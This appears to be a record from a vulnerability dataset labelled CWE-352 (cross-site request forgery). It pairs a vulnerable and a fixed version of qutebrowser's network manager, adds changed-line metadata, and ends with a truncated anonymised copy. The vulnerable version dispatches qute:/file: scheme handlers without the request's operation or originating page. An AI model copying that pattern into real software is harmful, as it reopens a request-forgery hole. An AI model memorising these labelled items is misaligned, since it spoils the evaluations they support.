        VAR_20, VAR_21 = self.make_request("GET", b"publicRooms")
        self.assertEquals(200, VAR_21.code, VAR_21.result)
        self.assertTrue(len(VAR_21.json_body["chunk"]) == 0)
        # ...and publishing another room to the directory is forbidden.
        VAR_19 = self.helper.create_room_as(self.user_id)
        VAR_20, VAR_21 = self.make_request(
            "PUT", b"directory/list/room/%s" % (VAR_19.encode("ascii"),), b"{}"
        )
        self.assertEquals(403, VAR_21.code, VAR_21.result)
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
18,
25,
28,
29,
32,
36,
38,
41,
43,
50,
52,
54,
58,
60,
67,
69,
71,
76,
78,
89,
96,
100,
102,
103,
111,
114,
115,
118,
119,
123,
126,
127,
131,
139,
145,
152,
158,
164,
165,
173,
178,
179,
182,
183,
187,
190,
191,
195,
197,
203,
213,
216,
218,
219,
226,
227,
232,
235,
237,
238,
245,
246,
251,
255,
256,
263,
264,
271,
272,
277,
278,
282,
289,
294,
295,
298,
299,
303,
306,
310,
311,
318,
324,
332,
335,
339,
343,
344,
350,
354,
357,
360,
361,
368,
374,
375,
381,
385,
386,
389,
391,
393,
399,
402,
404,
406,
409,
416,
419,
426,
427,
430,
432,
435,
440,
443,
445,
449,
450,
454,
457,
458,
462,
463,
469,
31,
280,
281,
133,
141,
154,
205,
215,
234,
253,
308,
320,
326,
334,
356
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
18,
25,
28,
29,
32,
36,
38,
41,
43,
50,
52,
54,
58,
60,
67,
69,
71,
76,
78,
89,
96,
100,
102,
103,
111,
114,
115,
118,
119,
123,
126,
127,
131,
139,
145,
152,
158,
164,
165,
173,
178,
179,
182,
183,
187,
190,
191,
195,
197,
203,
213,
216,
218,
219,
226,
227,
232,
235,
237,
238,
245,
246,
251,
255,
256,
263,
264,
271,
272,
277,
278,
282,
289,
294,
295,
298,
299,
303,
306,
310,
311,
318,
324,
332,
335,
339,
343,
344,
350,
354,
357,
360,
361,
368,
374,
375,
381,
385,
386,
389,
391,
393,
399,
402,
404,
406,
409,
416,
419,
426,
427,
430,
432,
435,
440,
443,
445,
449,
450,
454,
457,
458,
462,
463,
469,
31,
280,
281,
133,
141,
154,
205,
215,
234,
253,
308,
320,
326,
334,
356
] |
3CWE-352
| # vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2014-2018 Florian Bruhin (The Compiler) <mail@qutebrowser.org>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""Our own QNetworkAccessManager."""
import collections
import html
import attr
from PyQt5.QtCore import (pyqtSlot, pyqtSignal, QCoreApplication, QUrl,
QByteArray)
from PyQt5.QtNetwork import QNetworkAccessManager, QNetworkReply, QSslSocket
from qutebrowser.config import config
from qutebrowser.utils import (message, log, usertypes, utils, objreg,
urlutils, debug)
from qutebrowser.browser import shared
from qutebrowser.browser.webkit import certificateerror
from qutebrowser.browser.webkit.network import (webkitqutescheme, networkreply,
filescheme)
HOSTBLOCK_ERROR_STRING = '%HOSTBLOCK%'
_proxy_auth_cache = {}
@attr.s(frozen=True)
class ProxyId:
    """Information identifying a proxy server."""
    # Frozen (hence hashable) so instances can be used as keys in the
    # module-level _proxy_auth_cache dict.
    type = attr.ib()      # as returned by QNetworkProxy.type()
    hostname = attr.ib()  # as returned by QNetworkProxy.hostName()
    port = attr.ib()      # as returned by QNetworkProxy.port()
def _is_secure_cipher(cipher):
"""Check if a given SSL cipher (hopefully) isn't broken yet."""
tokens = [e.upper() for e in cipher.name().split('-')]
if cipher.usedBits() < 128:
# https://codereview.qt-project.org/#/c/75943/
return False
# OpenSSL should already protect against this in a better way
elif cipher.keyExchangeMethod() == 'DH' and utils.is_windows:
# https://weakdh.org/
return False
elif cipher.encryptionMethod().upper().startswith('RC4'):
# http://en.wikipedia.org/wiki/RC4#Security
# https://codereview.qt-project.org/#/c/148906/
return False
elif cipher.encryptionMethod().upper().startswith('DES'):
# http://en.wikipedia.org/wiki/Data_Encryption_Standard#Security_and_cryptanalysis
return False
elif 'MD5' in tokens:
# http://www.win.tue.nl/hashclash/rogue-ca/
return False
# OpenSSL should already protect against this in a better way
# elif (('CBC3' in tokens or 'CBC' in tokens) and (cipher.protocol() not in
# [QSsl.TlsV1_0, QSsl.TlsV1_1, QSsl.TlsV1_2])):
# # http://en.wikipedia.org/wiki/POODLE
# return False
### These things should never happen as those are already filtered out by
### either the SSL libraries or Qt - but let's be sure.
elif cipher.authenticationMethod() in ['aNULL', 'NULL']:
# Ciphers without authentication.
return False
elif cipher.encryptionMethod() in ['eNULL', 'NULL']:
# Ciphers without encryption.
return False
elif 'EXP' in tokens or 'EXPORT' in tokens:
# Weak export-grade ciphers
return False
elif 'ADH' in tokens:
# No MITM protection
return False
### This *should* happen ;)
else:
return True
def init():
    """Disable insecure SSL ciphers on old Qt versions."""
    default_ciphers = QSslSocket.defaultCiphers()
    log.init.debug("Default Qt ciphers: {}".format(
        ', '.join(c.name() for c in default_ciphers)))
    # Partition the default cipher list into secure/insecure and keep only
    # the secure ones (_is_secure_cipher only calls const getters, so
    # evaluating it twice per cipher is harmless).
    good_ciphers = [c for c in default_ciphers if _is_secure_cipher(c)]
    bad_ciphers = [c for c in default_ciphers if not _is_secure_cipher(c)]
    log.init.debug("Disabling bad ciphers: {}".format(
        ', '.join(c.name() for c in bad_ciphers)))
    QSslSocket.setDefaultCiphers(good_ciphers)
class NetworkManager(QNetworkAccessManager):
    """Our own QNetworkAccessManager.
    Attributes:
        adopted_downloads: If downloads are running with this QNAM but the
                           associated tab gets closed already, the NAM gets
                           reparented to the DownloadManager. This counts the
                           still running downloads, so the QNAM can clean
                           itself up when this reaches zero again.
        _scheme_handlers: A dictionary (scheme -> handler) of supported custom
                          schemes.
        _win_id: The window ID this NetworkManager is associated with.
                 (or None for generic network managers)
        _tab_id: The tab ID this NetworkManager is associated with.
                 (or None for generic network managers)
        _rejected_ssl_errors: A {QUrl: [SslError]} dict of rejected errors.
        _accepted_ssl_errors: A {QUrl: [SslError]} dict of accepted errors.
        _private: Whether we're in private browsing mode.
        netrc_used: Whether netrc authentication was performed.
    Signals:
        shutting_down: Emitted when the QNAM is shutting down.
    """
    shutting_down = pyqtSignal()
    def __init__(self, *, win_id, tab_id, private, parent=None):
        log.init.debug("Initializing NetworkManager")
        with log.disable_qt_msghandler():
            # WORKAROUND for a hang when a message is printed - See:
            # http://www.riverbankcomputing.com/pipermail/pyqt/2014-November/035045.html
            super().__init__(parent)
        log.init.debug("NetworkManager init done")
        self.adopted_downloads = 0
        self._args = objreg.get('args')
        self._win_id = win_id
        self._tab_id = tab_id
        self._private = private
        # Custom scheme handlers consulted before normal request dispatch
        # (see createRequest below).
        self._scheme_handlers = {
            'qute': webkitqutescheme.handler,
            'file': filescheme.handler,
        }
        self._set_cookiejar()
        self._set_cache()
        self.sslErrors.connect(self.on_ssl_errors)
        self._rejected_ssl_errors = collections.defaultdict(list)
        self._accepted_ssl_errors = collections.defaultdict(list)
        self.authenticationRequired.connect(self.on_authentication_required)
        self.proxyAuthenticationRequired.connect(
            self.on_proxy_authentication_required)
        self.netrc_used = False
    def _set_cookiejar(self):
        """Set the cookie jar of the NetworkManager correctly."""
        if self._private:
            cookie_jar = objreg.get('ram-cookie-jar')
        else:
            cookie_jar = objreg.get('cookie-jar')
        # We have a shared cookie jar - we restore its parent so we don't
        # take ownership of it.
        self.setCookieJar(cookie_jar)
        app = QCoreApplication.instance()
        cookie_jar.setParent(app)
    def _set_cache(self):
        """Set the cache of the NetworkManager correctly."""
        if self._private:
            # No on-disk cache in private browsing mode.
            return
        # We have a shared cache - we restore its parent so we don't take
        # ownership of it.
        app = QCoreApplication.instance()
        cache = objreg.get('cache')
        self.setCache(cache)
        cache.setParent(app)
    def _get_abort_signals(self, owner=None):
        """Get a list of signals which should abort a question."""
        abort_on = [self.shutting_down]
        if owner is not None:
            abort_on.append(owner.destroyed)
        # This might be a generic network manager, e.g. one belonging to a
        # DownloadManager. In this case, just skip the webview thing.
        if self._tab_id is not None:
            assert self._win_id is not None
            tab = objreg.get('tab', scope='tab', window=self._win_id,
                             tab=self._tab_id)
            abort_on.append(tab.load_started)
        return abort_on
    def shutdown(self):
        """Abort all running requests."""
        self.setNetworkAccessible(QNetworkAccessManager.NotAccessible)
        self.shutting_down.emit()
    # No @pyqtSlot here, see
    # https://github.com/qutebrowser/qutebrowser/issues/2213
    def on_ssl_errors(self, reply, errors):  # noqa: C901 pragma: no mccabe
        """Decide if SSL errors should be ignored or not.
        This slot is called on SSL/TLS errors by the self.sslErrors signal.
        Args:
            reply: The QNetworkReply that is encountering the errors.
            errors: A list of errors.
        """
        errors = [certificateerror.CertificateErrorWrapper(e) for e in errors]
        log.webview.debug("Certificate errors: {!r}".format(
            ' / '.join(str(err) for err in errors)))
        try:
            host_tpl = urlutils.host_tuple(reply.url())
        except ValueError:
            # Invalid URL: we can't cache a decision for it.
            host_tpl = None
            is_accepted = False
            is_rejected = False
        else:
            # Previously answered errors for this host are remembered, so we
            # only re-ask the user for error sets we haven't seen yet.
            is_accepted = set(errors).issubset(
                self._accepted_ssl_errors[host_tpl])
            is_rejected = set(errors).issubset(
                self._rejected_ssl_errors[host_tpl])
        log.webview.debug("Already accepted: {} / "
                          "rejected {}".format(is_accepted, is_rejected))
        if is_rejected:
            return
        elif is_accepted:
            reply.ignoreSslErrors()
            return
        abort_on = self._get_abort_signals(reply)
        ignore = shared.ignore_certificate_errors(reply.url(), errors,
                                                  abort_on=abort_on)
        if ignore:
            reply.ignoreSslErrors()
            err_dict = self._accepted_ssl_errors
        else:
            err_dict = self._rejected_ssl_errors
        if host_tpl is not None:
            # Remember the decision for subsequent errors on this host.
            err_dict[host_tpl] += errors
    def clear_all_ssl_errors(self):
        """Clear all remembered SSL errors."""
        self._accepted_ssl_errors.clear()
        self._rejected_ssl_errors.clear()
    @pyqtSlot(QUrl)
    def clear_rejected_ssl_errors(self, url):
        """Clear the rejected SSL errors on a reload.
        Args:
            url: The URL to remove.
        """
        try:
            del self._rejected_ssl_errors[url]
        except KeyError:
            pass
    @pyqtSlot('QNetworkReply*', 'QAuthenticator*')
    def on_authentication_required(self, reply, authenticator):
        """Called when a website needs authentication."""
        # Try netrc credentials once per manager before prompting the user.
        netrc_success = False
        if not self.netrc_used:
            self.netrc_used = True
            netrc_success = shared.netrc_authentication(reply.url(),
                                                        authenticator)
        if not netrc_success:
            abort_on = self._get_abort_signals(reply)
            shared.authentication_required(reply.url(), authenticator,
                                           abort_on=abort_on)
    @pyqtSlot('QNetworkProxy', 'QAuthenticator*')
    def on_proxy_authentication_required(self, proxy, authenticator):
        """Called when a proxy needs authentication."""
        # Answers are cached per proxy (module-level _proxy_auth_cache) so
        # the user is only prompted once per proxy server.
        proxy_id = ProxyId(proxy.type(), proxy.hostName(), proxy.port())
        if proxy_id in _proxy_auth_cache:
            user, password = _proxy_auth_cache[proxy_id]
            authenticator.setUser(user)
            authenticator.setPassword(password)
        else:
            msg = '<b>{}</b> says:<br/>{}'.format(
                html.escape(proxy.hostName()),
                html.escape(authenticator.realm()))
            abort_on = self._get_abort_signals()
            answer = message.ask(
                title="Proxy authentication required", text=msg,
                mode=usertypes.PromptMode.user_pwd, abort_on=abort_on)
            if answer is not None:
                authenticator.setUser(answer.user)
                authenticator.setPassword(answer.password)
                _proxy_auth_cache[proxy_id] = answer
    @pyqtSlot()
    def on_adopted_download_destroyed(self):
        """Check if we can clean up if an adopted download was destroyed.
        See the description for adopted_downloads for details.
        """
        self.adopted_downloads -= 1
        log.downloads.debug("Adopted download destroyed, {} left.".format(
            self.adopted_downloads))
        assert self.adopted_downloads >= 0
        if self.adopted_downloads == 0:
            self.deleteLater()
    @pyqtSlot(object)  # DownloadItem
    def adopt_download(self, download):
        """Adopt a new DownloadItem."""
        self.adopted_downloads += 1
        log.downloads.debug("Adopted download, {} adopted.".format(
            self.adopted_downloads))
        download.destroyed.connect(self.on_adopted_download_destroyed)
        download.adopt_download.connect(self.adopt_download)
    def set_referer(self, req, current_url):
        """Set the referer header."""
        referer_header_conf = config.val.content.headers.referer
        try:
            if referer_header_conf == 'never':
                # Note: using ''.encode('ascii') sends a header with no value,
                # instead of no header at all
                req.setRawHeader('Referer'.encode('ascii'), QByteArray())
            elif (referer_header_conf == 'same-domain' and
                  not urlutils.same_domain(req.url(), current_url)):
                req.setRawHeader('Referer'.encode('ascii'), QByteArray())
            # If refer_header_conf is set to 'always', we leave the header
            # alone as QtWebKit did set it.
        except urlutils.InvalidUrlError:
            # req.url() or current_url can be invalid - this happens on
            # https://www.playstation.com/ for example.
            pass
    # WORKAROUND for:
    # http://www.riverbankcomputing.com/pipermail/pyqt/2014-September/034806.html
    #
    # By returning False, we provoke a TypeError because of a wrong return
    # type, which does *not* trigger a segfault but invoke our return handler
    # immediately.
    @utils.prevent_exceptions(False)
    def createRequest(self, op, req, outgoing_data):
        """Return a new QNetworkReply object.
        Args:
            op: Operation op
            req: const QNetworkRequest & req
            outgoing_data: QIODevice * outgoingData
        Return:
            A QNetworkReply.
        """
        # A broken proxy configuration turns into an error reply up front.
        proxy_factory = objreg.get('proxy-factory', None)
        if proxy_factory is not None:
            proxy_error = proxy_factory.get_error()
            if proxy_error is not None:
                return networkreply.ErrorNetworkReply(
                    req, proxy_error, QNetworkReply.UnknownProxyError,
                    self)
        # Custom schemes (qute:, file:) are dispatched to their handlers; a
        # None result falls through to normal handling.
        scheme = req.url().scheme()
        if scheme in self._scheme_handlers:
            result = self._scheme_handlers[scheme](req)
            if result is not None:
                result.setParent(self)
                return result
        for header, value in shared.custom_headers(url=req.url()):
            req.setRawHeader(header, value)
        host_blocker = objreg.get('host-blocker')
        if host_blocker.is_blocked(req.url()):
            log.webview.info("Request to {} blocked by host blocker.".format(
                req.url().host()))
            return networkreply.ErrorNetworkReply(
                req, HOSTBLOCK_ERROR_STRING, QNetworkReply.ContentAccessDenied,
                self)
        # There are some scenarios where we can't figure out current_url:
        # - There's a generic NetworkManager, e.g. for downloads
        # - The download was in a tab which is now closed.
        current_url = QUrl()
        if self._tab_id is not None:
            assert self._win_id is not None
            try:
                tab = objreg.get('tab', scope='tab', window=self._win_id,
                                 tab=self._tab_id)
                current_url = tab.url()
            except (KeyError, RuntimeError):
                # https://github.com/qutebrowser/qutebrowser/issues/889
                # Catching RuntimeError because we could be in the middle of
                # the webpage shutdown here.
                current_url = QUrl()
        if 'log-requests' in self._args.debug_flags:
            operation = debug.qenum_key(QNetworkAccessManager, op)
            operation = operation.replace('Operation', '').upper()
            log.webview.debug("{} {}, first-party {}".format(
                operation,
                req.url().toDisplayString(),
                current_url.toDisplayString()))
        self.set_referer(req, current_url)
        return super().createRequest(op, req, outgoing_data)
| # vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2014-2018 Florian Bruhin (The Compiler) <mail@qutebrowser.org>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""Our own QNetworkAccessManager."""
import collections
import html
import attr
from PyQt5.QtCore import (pyqtSlot, pyqtSignal, QCoreApplication, QUrl,
QByteArray)
from PyQt5.QtNetwork import QNetworkAccessManager, QNetworkReply, QSslSocket
from qutebrowser.config import config
from qutebrowser.utils import (message, log, usertypes, utils, objreg,
urlutils, debug)
from qutebrowser.browser import shared
from qutebrowser.browser.webkit import certificateerror
from qutebrowser.browser.webkit.network import (webkitqutescheme, networkreply,
filescheme)
HOSTBLOCK_ERROR_STRING = '%HOSTBLOCK%'
_proxy_auth_cache = {}
@attr.s(frozen=True)
class ProxyId:
    """Information identifying a proxy server."""
    # Frozen (hence hashable) so instances can be used as keys in the
    # module-level _proxy_auth_cache dict.
    type = attr.ib()      # as returned by QNetworkProxy.type()
    hostname = attr.ib()  # as returned by QNetworkProxy.hostName()
    port = attr.ib()      # as returned by QNetworkProxy.port()
def _is_secure_cipher(cipher):
"""Check if a given SSL cipher (hopefully) isn't broken yet."""
tokens = [e.upper() for e in cipher.name().split('-')]
if cipher.usedBits() < 128:
# https://codereview.qt-project.org/#/c/75943/
return False
# OpenSSL should already protect against this in a better way
elif cipher.keyExchangeMethod() == 'DH' and utils.is_windows:
# https://weakdh.org/
return False
elif cipher.encryptionMethod().upper().startswith('RC4'):
# http://en.wikipedia.org/wiki/RC4#Security
# https://codereview.qt-project.org/#/c/148906/
return False
elif cipher.encryptionMethod().upper().startswith('DES'):
# http://en.wikipedia.org/wiki/Data_Encryption_Standard#Security_and_cryptanalysis
return False
elif 'MD5' in tokens:
# http://www.win.tue.nl/hashclash/rogue-ca/
return False
# OpenSSL should already protect against this in a better way
# elif (('CBC3' in tokens or 'CBC' in tokens) and (cipher.protocol() not in
# [QSsl.TlsV1_0, QSsl.TlsV1_1, QSsl.TlsV1_2])):
# # http://en.wikipedia.org/wiki/POODLE
# return False
### These things should never happen as those are already filtered out by
### either the SSL libraries or Qt - but let's be sure.
elif cipher.authenticationMethod() in ['aNULL', 'NULL']:
# Ciphers without authentication.
return False
elif cipher.encryptionMethod() in ['eNULL', 'NULL']:
# Ciphers without encryption.
return False
elif 'EXP' in tokens or 'EXPORT' in tokens:
# Weak export-grade ciphers
return False
elif 'ADH' in tokens:
# No MITM protection
return False
### This *should* happen ;)
else:
return True
def init():
    """Disable insecure SSL ciphers on old Qt versions."""
    default_ciphers = QSslSocket.defaultCiphers()
    log.init.debug("Default Qt ciphers: {}".format(
        ', '.join(c.name() for c in default_ciphers)))
    # Partition the default cipher list into secure/insecure and keep only
    # the secure ones (_is_secure_cipher only calls const getters, so
    # evaluating it twice per cipher is harmless).
    good_ciphers = [c for c in default_ciphers if _is_secure_cipher(c)]
    bad_ciphers = [c for c in default_ciphers if not _is_secure_cipher(c)]
    log.init.debug("Disabling bad ciphers: {}".format(
        ', '.join(c.name() for c in bad_ciphers)))
    QSslSocket.setDefaultCiphers(good_ciphers)
class NetworkManager(QNetworkAccessManager):
"""Our own QNetworkAccessManager.
Attributes:
adopted_downloads: If downloads are running with this QNAM but the
associated tab gets closed already, the NAM gets
reparented to the DownloadManager. This counts the
still running downloads, so the QNAM can clean
itself up when this reaches zero again.
_scheme_handlers: A dictionary (scheme -> handler) of supported custom
schemes.
_win_id: The window ID this NetworkManager is associated with.
(or None for generic network managers)
_tab_id: The tab ID this NetworkManager is associated with.
(or None for generic network managers)
_rejected_ssl_errors: A {QUrl: [SslError]} dict of rejected errors.
_accepted_ssl_errors: A {QUrl: [SslError]} dict of accepted errors.
_private: Whether we're in private browsing mode.
netrc_used: Whether netrc authentication was performed.
Signals:
shutting_down: Emitted when the QNAM is shutting down.
"""
shutting_down = pyqtSignal()
def __init__(self, *, win_id, tab_id, private, parent=None):
log.init.debug("Initializing NetworkManager")
with log.disable_qt_msghandler():
# WORKAROUND for a hang when a message is printed - See:
# http://www.riverbankcomputing.com/pipermail/pyqt/2014-November/035045.html
super().__init__(parent)
log.init.debug("NetworkManager init done")
self.adopted_downloads = 0
self._args = objreg.get('args')
self._win_id = win_id
self._tab_id = tab_id
self._private = private
self._scheme_handlers = {
'qute': webkitqutescheme.handler,
'file': filescheme.handler,
}
self._set_cookiejar()
self._set_cache()
self.sslErrors.connect(self.on_ssl_errors)
self._rejected_ssl_errors = collections.defaultdict(list)
self._accepted_ssl_errors = collections.defaultdict(list)
self.authenticationRequired.connect(self.on_authentication_required)
self.proxyAuthenticationRequired.connect(
self.on_proxy_authentication_required)
self.netrc_used = False
def _set_cookiejar(self):
"""Set the cookie jar of the NetworkManager correctly."""
if self._private:
cookie_jar = objreg.get('ram-cookie-jar')
else:
cookie_jar = objreg.get('cookie-jar')
# We have a shared cookie jar - we restore its parent so we don't
# take ownership of it.
self.setCookieJar(cookie_jar)
app = QCoreApplication.instance()
cookie_jar.setParent(app)
def _set_cache(self):
"""Set the cache of the NetworkManager correctly."""
if self._private:
return
# We have a shared cache - we restore its parent so we don't take
# ownership of it.
app = QCoreApplication.instance()
cache = objreg.get('cache')
self.setCache(cache)
cache.setParent(app)
def _get_abort_signals(self, owner=None):
"""Get a list of signals which should abort a question."""
abort_on = [self.shutting_down]
if owner is not None:
abort_on.append(owner.destroyed)
# This might be a generic network manager, e.g. one belonging to a
# DownloadManager. In this case, just skip the webview thing.
if self._tab_id is not None:
assert self._win_id is not None
tab = objreg.get('tab', scope='tab', window=self._win_id,
tab=self._tab_id)
abort_on.append(tab.load_started)
return abort_on
def shutdown(self):
"""Abort all running requests."""
self.setNetworkAccessible(QNetworkAccessManager.NotAccessible)
self.shutting_down.emit()
# No @pyqtSlot here, see
# https://github.com/qutebrowser/qutebrowser/issues/2213
def on_ssl_errors(self, reply, errors): # noqa: C901 pragma: no mccabe
"""Decide if SSL errors should be ignored or not.
This slot is called on SSL/TLS errors by the self.sslErrors signal.
Args:
reply: The QNetworkReply that is encountering the errors.
errors: A list of errors.
"""
errors = [certificateerror.CertificateErrorWrapper(e) for e in errors]
log.webview.debug("Certificate errors: {!r}".format(
' / '.join(str(err) for err in errors)))
try:
host_tpl = urlutils.host_tuple(reply.url())
except ValueError:
host_tpl = None
is_accepted = False
is_rejected = False
else:
is_accepted = set(errors).issubset(
self._accepted_ssl_errors[host_tpl])
is_rejected = set(errors).issubset(
self._rejected_ssl_errors[host_tpl])
log.webview.debug("Already accepted: {} / "
"rejected {}".format(is_accepted, is_rejected))
if is_rejected:
return
elif is_accepted:
reply.ignoreSslErrors()
return
abort_on = self._get_abort_signals(reply)
ignore = shared.ignore_certificate_errors(reply.url(), errors,
abort_on=abort_on)
if ignore:
reply.ignoreSslErrors()
err_dict = self._accepted_ssl_errors
else:
err_dict = self._rejected_ssl_errors
if host_tpl is not None:
err_dict[host_tpl] += errors
def clear_all_ssl_errors(self):
"""Clear all remembered SSL errors."""
self._accepted_ssl_errors.clear()
self._rejected_ssl_errors.clear()
@pyqtSlot(QUrl)
def clear_rejected_ssl_errors(self, url):
"""Clear the rejected SSL errors on a reload.
Args:
url: The URL to remove.
"""
try:
del self._rejected_ssl_errors[url]
except KeyError:
pass
@pyqtSlot('QNetworkReply*', 'QAuthenticator*')
def on_authentication_required(self, reply, authenticator):
"""Called when a website needs authentication."""
netrc_success = False
if not self.netrc_used:
self.netrc_used = True
netrc_success = shared.netrc_authentication(reply.url(),
authenticator)
if not netrc_success:
abort_on = self._get_abort_signals(reply)
shared.authentication_required(reply.url(), authenticator,
abort_on=abort_on)
@pyqtSlot('QNetworkProxy', 'QAuthenticator*')
def on_proxy_authentication_required(self, proxy, authenticator):
"""Called when a proxy needs authentication."""
proxy_id = ProxyId(proxy.type(), proxy.hostName(), proxy.port())
if proxy_id in _proxy_auth_cache:
user, password = _proxy_auth_cache[proxy_id]
authenticator.setUser(user)
authenticator.setPassword(password)
else:
msg = '<b>{}</b> says:<br/>{}'.format(
html.escape(proxy.hostName()),
html.escape(authenticator.realm()))
abort_on = self._get_abort_signals()
answer = message.ask(
title="Proxy authentication required", text=msg,
mode=usertypes.PromptMode.user_pwd, abort_on=abort_on)
if answer is not None:
authenticator.setUser(answer.user)
authenticator.setPassword(answer.password)
_proxy_auth_cache[proxy_id] = answer
@pyqtSlot()
def on_adopted_download_destroyed(self):
"""Check if we can clean up if an adopted download was destroyed.
See the description for adopted_downloads for details.
"""
self.adopted_downloads -= 1
log.downloads.debug("Adopted download destroyed, {} left.".format(
self.adopted_downloads))
assert self.adopted_downloads >= 0
if self.adopted_downloads == 0:
self.deleteLater()
@pyqtSlot(object) # DownloadItem
def adopt_download(self, download):
"""Adopt a new DownloadItem."""
self.adopted_downloads += 1
log.downloads.debug("Adopted download, {} adopted.".format(
self.adopted_downloads))
download.destroyed.connect(self.on_adopted_download_destroyed)
download.adopt_download.connect(self.adopt_download)
def set_referer(self, req, current_url):
"""Set the referer header."""
referer_header_conf = config.val.content.headers.referer
try:
if referer_header_conf == 'never':
# Note: using ''.encode('ascii') sends a header with no value,
# instead of no header at all
req.setRawHeader('Referer'.encode('ascii'), QByteArray())
elif (referer_header_conf == 'same-domain' and
not urlutils.same_domain(req.url(), current_url)):
req.setRawHeader('Referer'.encode('ascii'), QByteArray())
# If refer_header_conf is set to 'always', we leave the header
# alone as QtWebKit did set it.
except urlutils.InvalidUrlError:
# req.url() or current_url can be invalid - this happens on
# https://www.playstation.com/ for example.
pass
# WORKAROUND for:
# http://www.riverbankcomputing.com/pipermail/pyqt/2014-September/034806.html
#
# By returning False, we provoke a TypeError because of a wrong return
# type, which does *not* trigger a segfault but invoke our return handler
# immediately.
@utils.prevent_exceptions(False)
def createRequest(self, op, req, outgoing_data):
"""Return a new QNetworkReply object.
Args:
op: Operation op
req: const QNetworkRequest & req
outgoing_data: QIODevice * outgoingData
Return:
A QNetworkReply.
"""
proxy_factory = objreg.get('proxy-factory', None)
if proxy_factory is not None:
proxy_error = proxy_factory.get_error()
if proxy_error is not None:
return networkreply.ErrorNetworkReply(
req, proxy_error, QNetworkReply.UnknownProxyError,
self)
for header, value in shared.custom_headers(url=req.url()):
req.setRawHeader(header, value)
host_blocker = objreg.get('host-blocker')
if host_blocker.is_blocked(req.url()):
log.webview.info("Request to {} blocked by host blocker.".format(
req.url().host()))
return networkreply.ErrorNetworkReply(
req, HOSTBLOCK_ERROR_STRING, QNetworkReply.ContentAccessDenied,
self)
# There are some scenarios where we can't figure out current_url:
# - There's a generic NetworkManager, e.g. for downloads
# - The download was in a tab which is now closed.
current_url = QUrl()
if self._tab_id is not None:
assert self._win_id is not None
try:
tab = objreg.get('tab', scope='tab', window=self._win_id,
tab=self._tab_id)
current_url = tab.url()
except (KeyError, RuntimeError):
# https://github.com/qutebrowser/qutebrowser/issues/889
# Catching RuntimeError because we could be in the middle of
# the webpage shutdown here.
current_url = QUrl()
if 'log-requests' in self._args.debug_flags:
operation = debug.qenum_key(QNetworkAccessManager, op)
operation = operation.replace('Operation', '').upper()
log.webview.debug("{} {}, first-party {}".format(
operation,
req.url().toDisplayString(),
current_url.toDisplayString()))
scheme = req.url().scheme()
if scheme in self._scheme_handlers:
result = self._scheme_handlers[scheme](req, op, current_url)
if result is not None:
result.setParent(self)
return result
self.set_referer(req, current_url)
return super().createRequest(op, req, outgoing_data)
| xsrf | {
"code": [
" scheme = req.url().scheme()",
" if scheme in self._scheme_handlers:",
" result = self._scheme_handlers[scheme](req)",
" if result is not None:",
" result.setParent(self)",
" return result"
],
"line_no": [
376,
377,
378,
379,
380,
381
]
} | {
"code": [
" scheme = req.url().scheme()",
" if scheme in self._scheme_handlers:",
" result = self._scheme_handlers[scheme](req, op, current_url)",
" if result is not None:",
" result.setParent(self)",
" return result"
],
"line_no": [
412,
413,
414,
415,
416,
417
]
} |
import collections
import html
import attr
from PyQt5.QtCore import (pyqtSlot, pyqtSignal, QCoreApplication, QUrl,
QByteArray)
from PyQt5.QtNetwork import QNetworkAccessManager, QNetworkReply, QSslSocket
from qutebrowser.config import config
from qutebrowser.utils import (message, log, usertypes, utils, objreg,
urlutils, debug)
from qutebrowser.browser import shared
from qutebrowser.browser.webkit import certificateerror
from qutebrowser.browser.webkit.network import (webkitqutescheme, networkreply,
filescheme)
VAR_0 = '%HOSTBLOCK%'
VAR_1 = {}
@attr.s(frozen=True)
class CLASS_0:
VAR_3 = attr.ib()
VAR_4 = attr.ib()
VAR_5 = attr.ib()
def FUNC_0(VAR_2):
VAR_6 = [e.upper() for e in VAR_2.name().split('-')]
if VAR_2.usedBits() < 128:
return False
elif VAR_2.keyExchangeMethod() == 'DH' and utils.is_windows:
return False
elif VAR_2.encryptionMethod().upper().startswith('RC4'):
return False
elif VAR_2.encryptionMethod().upper().startswith('DES'):
return False
elif 'MD5' in VAR_6:
return False
elif VAR_2.authenticationMethod() in ['aNULL', 'NULL']:
return False
elif VAR_2.encryptionMethod() in ['eNULL', 'NULL']:
return False
elif 'EXP' in VAR_6 or 'EXPORT' in VAR_6:
return False
elif 'ADH' in VAR_6:
return False
else:
return True
def FUNC_1():
VAR_7 = QSslSocket.defaultCiphers()
log.init.debug("Default Qt ciphers: {}".format(
', '.join(c.name() for c in VAR_7)))
VAR_8 = []
VAR_9 = []
for VAR_2 in VAR_7:
if FUNC_0(VAR_2):
VAR_8.append(VAR_2)
else:
VAR_9.append(VAR_2)
log.init.debug("Disabling bad ciphers: {}".format(
', '.join(c.name() for c in VAR_9)))
QSslSocket.setDefaultCiphers(VAR_8)
class CLASS_1(QNetworkAccessManager):
VAR_10 = pyqtSignal()
def __init__(self, *, VAR_11, VAR_12, VAR_13, VAR_14=None):
log.init.debug("Initializing NetworkManager")
with log.disable_qt_msghandler():
super().__init__(VAR_14)
log.init.debug("NetworkManager FUNC_1 done")
self.adopted_downloads = 0
self._args = objreg.get('args')
self._win_id = VAR_11
self._tab_id = VAR_12
self._private = VAR_13
self._scheme_handlers = {
'qute': webkitqutescheme.handler,
